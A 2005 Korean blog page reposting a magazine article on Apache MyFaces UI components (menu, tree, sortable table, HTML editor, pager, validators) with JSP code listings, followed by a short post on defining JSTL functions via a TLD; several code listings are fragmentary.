    MyFaces는 다양한 컴포넌트들로 무장하고 있다. 기존 웹 기반의 자바 프레임워크가 가지지 않는 이런 여러 가지 UI단 컴포넌트들은 MyFaces가 가는 길을 좀 더 편하게 만들 것이다. 많은 개발자들이 평소 프로젝트를 진행하면서, ‘아 이런 UI 컴포넌트들이 있었으면 좋겠다!’라고 생각했던 것의 대부분을 MyFaces에서 만나볼 수 있다. 또한 MyFaces는 JSF의 구현체로써 기본적인 JSF 관련 태그 선언부의 경우 다음과 같이 JSF를 따르고 있다.

    <%@ taglib uri=”http://java.sun.com/jsf/html” prefix=”h”%>
    <%@ taglib uri=”http://java.sun.com/jsf/core” prefix=”f”%>

    MyFaces의 확장 컴포넌트를 사용하기 위해서는 다음과 같은 선언부를 사용해야 한다.

    <%@ taglib uri=”http://myfaces.apache.org/extensions” prefix=”x”%>
    <%@ taglib uri=”http://myfaces.apache.org/wap” prefix=”wap”%>

    JSCook 메뉴 컴포넌트
    JSCook 메뉴 컴포넌트는 <화면 2>에서 보듯이 웹 페이지의 메뉴를 만들어 낼 수 있는 컴포넌트이다. 커스텀 태그(custom tag)로 제공되고 실제 실행은 자바스크립트에 의해 동작된다. JSCook 메뉴는 Heng Yuan이라는 청년에 의해 개발된 자바스크립트로 작성된 메뉴 스크립트이다. 본래의 JSCook 메뉴의 경우 자바스크립트의 변수로 메뉴들을 정의하고, 이렇게 정의된 변수를 통해 자바스크립트가 메뉴를 표현하게 되어 있었다(변수로 메뉴를 정의하는 것은 상당히 번거로운 작업처럼 보였는데, JSCook의 홈페이지에서는 이런 메뉴 변수를 정의하는 Menu Builder를 제공하고 있다. Menu Builder는 브라우저상에서 메뉴의 이름과 아이콘 위치 등을 입력하면 자동으로 자바스크립트 소스를 만들어준다).




    MyFaces에서는 커스텀 태그를 통해 정의된 메뉴의 URL과 레이블, 아이콘들을 정의한다. 실제 브라우저의 요청에 의해 커스텀 태그가 동작하게 되면(자바스크립트로써) 기존의 JSCook 메뉴가 원하는 형태의 소스로 변경된다. 즉 JSCook 메뉴의 경우 MyFaces의 커스텀 태그를 사용할 수도 있고, 자바스크립트 형태로도 사용할 수 있음으로 때에 따라 적절한 방법을 사용하면 된다. JSCook 메뉴를 구성하는 항목은 유일한 아이디와 아이템 레이블 그리고 링크 클릭시의 액션으로 구성되며, 모든 JSCook 메뉴는 <x:jscookMenu/> 태그를 부모 태그로 해야 하며, 각 메뉴 항목은 <x:navigationMenuItem/>으로 추가할 수 있다.

    <리스트 1> JSCook 메뉴 예제
    <%@ taglib uri="http://myfaces.apache.org/extensions" prefix="x"%>
    <x:jscookMenu layout="hbr" theme="ThemeOffice" >
      <x:navigationMenuItem id="nav_1" itemLabel="#{example_messages['nav_Home']}" action="go_home" />
      <x:navigationMenuItem id="nav_2" itemLabel="#{example_messages['nav_Examples']}" >
        <x:navigationMenuItem id="nav_2_1" itemLabel="#{example_messages['nav_Sample_1']}" action="go_sample1" icon="images/myfaces.gif" />

    트리 컴포넌트
    트리 컴포넌트의 경우 <화면 3>처럼 보이는 전형적인 트리의 형태를 갖추고 있으며, <리스트 2>의 예제를 보면 벌써 몇몇 개발자의 입에서는 탄성이 나올 법한 코드로 이뤄져 있다. DefultMutableTree Node 등 기존 Swing에서 사용하던 트리 컴포넌트와 거의 동일한 형태로 제공되며 사용하기도 상당히 편리하다. JSP의 Scriptlet을 통해 트리 컴포넌트를 구성하는 각 노드들에 대해 생성하고, Root 트리 노드를 기준으로 insert 메쏘드를 통하여 추가할 수 있다. 또한 구성된 트리 구조를 pageContext의 Attribute에 넣어 페이지가 다시 리로딩되거나 호출됐을 때 기존에 구성된 트리 구조를 재사용하도록 하고 있다. 트리 컴포넌트는 <x:tree/> 태그를 부모로 하여 구성되며, value 항목에 스크립트릿으로 TreeModel을 구성하여 pageContext에 셋팅된 값이 보여진다.

    <리스트 2> 트리 예제
    <%@ page import="org.apache.myfaces.custom.tree.DefaultMutableTreeNode,
    <%@ page session="true" contentType="text/html;charset=EUC-KR"%>
    <%@ taglib uri="
    http://myfaces.apache.org/extensions" prefix="x"%>

       if (pageContext.getAttribute("treeModel", PageContext.SESSION_SCOPE) == null) {
          DefaultMutableTreeNode root = new DefaultMutableTreeNode("XY");
          DefaultMutableTreeNode a = new DefaultMutableTreeNode("A");
          DefaultMutableTreeNode b = new DefaultMutableTreeNode("B");
          DefaultMutableTreeNode c = new DefaultMutableTreeNode("C");

          DefaultMutableTreeNode node = new DefaultMutableTreeNode("a1");
          node = new DefaultMutableTreeNode("a2 ");
          node = new DefaultMutableTreeNode("b ");

          a = node;
          node = new DefaultMutableTreeNode("x1");
          node = new DefaultMutableTreeNode("x2");

          pageContext.setAttribute("treeModel", new DefaultTreeModel(root), PageContext.SESSION_SCOPE);

    <x:tree id="tree" value="#{treeModel}"

    정렬 가능한 테이블 컴포넌트
    <x:dataTable/>은 HTML의 Table 형태로 데이터를 표현하는 수단으로 상당히 유용하게 사용할 수 있는 태그이다. 정렬 가능한 테이블은 dataTable이라는 CustomTag에 sortColumn과 sortAscending이라는 속성을 부여해 줌으로써 정렬 가능한 테이블 형태로 보여주는 것이다. <화면 4>에서 Car Type과 Car Color 부분을 클릭하면 순방향 정렬과 역방향 정렬로 토글(toggle)되며 내용이 표시된다. dataTable의 Header 영역에 sort를 할 수 있는 링크를 주기 위해 command SortHeader를 사용하고 있고 화살표의 사용여부를 arrow=”true”로 설정하고 있다. <x:dataTable/>을 부모 태그로 사용하며 각 컬럼마다 <h:column/>을 사용하여 테이블 구조를 나타나게 된다.

    <리스트 3> 정렬 가능한 테이블 예제
    <x:dataTable styleClass="standardTable"

        <f:facet name="header">
            <h:outputText value="(header table)"  />
        <f:facet name="footer">
            <h:outputText value="(footer table)"  />

            <f:facet name="header">
                <x:commandSortHeader columnName="type" arrow="true">
                    <h:outputText value="#{example_messages['sort_cartype']}" />
            <h:outputText value="#{car.type}" />
            <f:facet name="footer">
                <h:outputText id="ftr1" value="(footer col1)"  />

            <f:facet name="header">
                <x:commandSortHeader columnName="color" arrow="true">
                    <h:outputText value="#{example_messages['sort_carcolor']}" />
            <h:outputText value="#{car.color}" />
            <f:facet name="footer">
                <h:outputText id="ftr2" value="(footer col2)"  />


    HTML 에디터 컴포넌트
    HTML 에디터 컴포넌트의 경우 Kupu라는 이름으로 존재하던 WYSIWYG XHTML 에디터를 MyFaces의 컴포넌트로 포함시킨 것이다. HTML 에디터의 경우 상당히 많은 사이트에서 사용되고 있지만 웹 프레임워크 단에서의 UI 컴포넌트로 제공되는 것은 처음이 아닌가 싶다. HTML 에디터의 경우 글자체, Bold, Underline 등의 폰트를 꾸밀 수 있는 버튼과 색상, 정렬 등 다른 상용 HTML 에디터와 비교해도 뒤떨어지지 않는 기능성을 보여주고 있다. HTML 에디터 커스텀 태그의 경우 필수 속성은 없다.

    <리스트 4> HTML 에디터 컴포넌트 예제
    <x:htmlEditor value="#{editor.text}"
     style="height: 60ex;"

    DataScroller 컴포넌트
    DataScroller 컴포넌트의 경우 리스트를 표현하는 JSP 단에서 페이지 이동을 할 때 사용하는 컴포넌트이다. 페이지 이동의 경우 몇몇 사이트에서 커스텀 태그를 만들어 사용하는 경우를 보았으나, 거의 대부분은 특별한 표준이 없이 개발되고 있는 것 중에 하나이다. 하지만 리스트의 경우 페이지 이동은 필수적인 컴포넌트인 것을 보면, My Faces에 DataScroller가 있다는 것은 참으로 다행스러운 일이다. 또한 <x:dataScroller/>를 부모 태그로 하여 현재 페이지를 나타낼 pageCountVal 속성이 존재하며, 각 페이지의 navigation의 여부를 paginator 속성의 boolean 타입을 정의하고 보여질 총 페이지 수를 paginatorMaxPages로 정의할 수 있다.

    <리스트 5> DataScroller 예제
    <x:dataScroller id="scroll_1"
        <f:facet name="first" >
            <h:graphicImage url="images/arrow-first.gif" border="1" />
        <f:facet name="last">
            <h:graphicImage url="images/arrow-last.gif" border="1" />
        <f:facet name="previous">
            <h:graphicImage url="images/arrow-previous.gif" border="1" />
        <f:facet name="next">
            <h:graphicImage url="images/arrow-next.gif" border="1" />
        <f:facet name="fastforward">
            <h:graphicImage url="images/arrow-ff.gif" border="1" />
        <f:facet name="fastrewind">
            <h:graphicImage url="images/arrow-fr.gif" border="1" />
    <x:dataScroller id="scroll_2"
        <h:outputFormat value="#{example_messages['dataScroller_pages']}" styleClass="standard" >
            <f:param value="#{rowsCount}" />
            <f:param value="#{displayedRowsCountVar}" />
            <f:param value="#{firstRowIndex}" />
            <f:param value="#{lastRowIndex}" />
            <f:param value="#{pageIndex}" />
            <f:param value="#{pageCount}" />

    여러 Validation 컴포넌트
    MyFaces의 Validation의 경우 썬 JSF RI가 세 가지 정도의 기본적인 Validation을 제공하는 것에 추가적으로 이메일, 신용카드 , ISBN, Equal 같은 상당히 유용한 Validation을 제공한다. Valication을 넣는 방법으로는 <f:validator/> 태그에 validatorId로써 사용하고자 하는 Validator 클래스를 지정하는 방법과 <x:validateXXX/>와 같은 MyFaces의 확장 태그 형태로 사용할 수 있다.

    <리스트 6> Validation 예제
    <h:outputLabel for="form1:email" value="#{example_messages['validate_email']}" />
    <h:inputText id="email" value="#{validateForm.email}" required="true">
        <f:validator validatorId="org.apache.myfaces.validator.Email"/>
    <h:message id="emailError" for="form1:email" styleClass="error" />

    <h:outputLabel for="form1:email2" value="#{example_messages['validate_email']}2" />
    <h:inputText id="email2" value="#{validateForm.email2}" required="true">
        <x:validateEmail />
    <h:message id="emailError2" for="form1:email2" styleClass="error" />

    <h:outputLabel for="form1:creditCardNumber" value="#{example_messages['validate_credit']}" />
    <h:inputText id="creditCardNumber" value="#{validateForm.creditCardNumber}" required="true">
        <x:validateCreditCard />
    <h:message id="creditCardNumberError" for="form1:creditCardNumber" styleClass="error" />

         <h:outputLabel for="form1:regExprValue" value="#{example_messages['validate_regexp']}" />
    <h:inputText id="regExprValue" value="#{validateForm.regExpr}" required="true">
        <x:validateRegExpr pattern='d{5}' />
         <h:message id="regExprValueError" for="form1:regExprValue" styleClass="error" />

         <h:outputLabel for="form1:isbn" value="#{example_messages['validate_isbn']}" />
    <h:inputText id="isbn" value="#{validateForm.isbn}" required="true">
        <x:validateISBN />
         <h:message id="isbnError" for="form1:isbn" styleClass="error" />

    <h:outputLabel for="form1:equal" value="#{example_messages['validate_equal']}" />
    <h:inputText id="equal" value="#{validateForm.equal}" required="true"/>
    <h:message id="equalError" for="form1:equal" styleClass="error" />

    <h:outputLabel for="form1:equal2" value="#{example_messages['validate_equal']}2" />
    <h:inputText id="equal2" value="#{validateForm.equal2}" required="true">
        <x:validateEqual for="form1:equal" />
    <h:message id="equal2Error" for="form1:equal2" styleClass="error" />

    <h:commandButton id="validateButton" value="#{example_messages['button_submit']}" action="#{validateForm.submit}"/>

    MyFaces의 장밋빛 미래
    JSF가 자바 표준 스펙으로써 향후 J2EE의 웹 프레임워크의 중심이 될 것이라는 생각은 그리 어렵지 않게 할 수 있다. 또한 MyFaces가 JSF의 오픈소스 구현체로써 상당히 중요하게 대접(?)받을 것도 쉽게 알 수 있다. MyFaces는 충실한 JSF의 구현체이면서 유용한 컴포넌트들로 무장하고 있다. 다만 조금 걱정이 되는 부분은 UI가 상당히 다이나믹한 국내의 실정에서 얼마나 적용 가능성이 있을지에 대한 우려와 개발자 입장에서 커스텀 태그에 대한 사용이 얼마나 쉽게 받아들일 수 있는가가 문제가 될 수 있을 것으로 보인다. MyFaces는 이클립스와 같은 IDE와의 연계성, J2EE 진영의 주요 벤더에서 JSF를 제대로 지원하는 순간부터 MyFaces의 활용도는 그 어떤 JSF의 구현체보다 활발할 것이다. 아직 제한된 오픈소스만을 사용하는 국내 실정에서 좀 더 많은 오픈소스를 사용하게 되는 계기가 MyFaces를 통해 시작되기를 간절히 바랄뿐이다. [maso]



    출처 : http://www.imaso.co.kr/?doc=bbs/gnuboard.php&bo_table=article&wr_id=6094


    'JAVA > JSP_Servlet' 카테고리의 다른 글

    [펌] 자바툴(솔루션) 정리  (0) 2005.11.16
    sitemesh ..  (0) 2005.11.09
    [link] XMLC Site....  (0) 2005.10.25
    [link] 자바 어플로 만든 쇼핑몰  (0) 2005.10.25
    [펌] JSP 2.0에서 Custom Tag활용  (0) 2005.10.25
    Posted by tornado

    'JAVA > JSP_Servlet' 카테고리의 다른 글

    sitemesh ..  (0) 2005.11.09
    [펌] JSF의 새로운 얼굴, MyFaces  (0) 2005.10.27
    [link] 자바 어플로 만든 쇼핑몰  (0) 2005.10.25
    [펌] JSP 2.0에서 Custom Tag활용  (0) 2005.10.25
    [link] ajaxfaces.com  (0) 2005.10.25
    Posted by tornado
    Posted by tornado
    오늘 회사메일에 지방에 파견나가신 김모과장님이 보내신 글을 읽어보니...
    유익한 정보일 거 같아서 끄적여 본다.
    ============================= 발췌 부분 시작 ======================================
    JSP 2.0의 el( ${} )과 jstl(c, fmt, fn)을 쓰다보면 이렇게 편할수 있구나 하고 느꼇는데...
    뭔가 부족한게 있어서 fn관련 Soruce를 보게 되었는데..
    헉....  fn.tld를 보면 <function>이라는 tag에 class명과 호출 방식으로 선언되어 있고
    Classs를 보면 일반 Static function을 바로 불러 쓰고 있었습니다.
    다음은 fn.tld의 예 인데.. 너무 단순하지요...
    taglib를 만든 다기 보다는 taglib에 기존 Class 함수를 정의만 해두면 되니까요.
    ------------------- [mi-html-util.tld]----------------
       New line to br tag
       java.lang.String nl2br(java.lang.String)
       ${mhtml:nl2br(String txt)}
     ---------------- HTMLUtil.java --------------
    package javacross.util;
    public class HTMLUtil {
        static final RE reg_NL = new RE("(\015\012)|(\015)|(\012)");
        public static String nl2br(String txt){
           if (txt == null) {
               return null;
           } else {
              return reg_NL.subst(txt,"<br />" );
    public static String null2nbsp(String txt){
      if (txt == null) {
       return "&nbsp;";
      } else {
       return txt;
    ------------------- test.jsp ----------------------
    <%@ page language="java" contentType="text/html; charset=MS949" %>
    <%@ taglib prefix="mhtml" uri="/WEB-INF/tld/mi-html-util.tld" %>
      <th>테스트 해보기</th>
    ============================= 발췌 부분 끝 ========================================
    김과장님... 항상 유익한 정보 감사드립니다. ^^
    Posted by tornado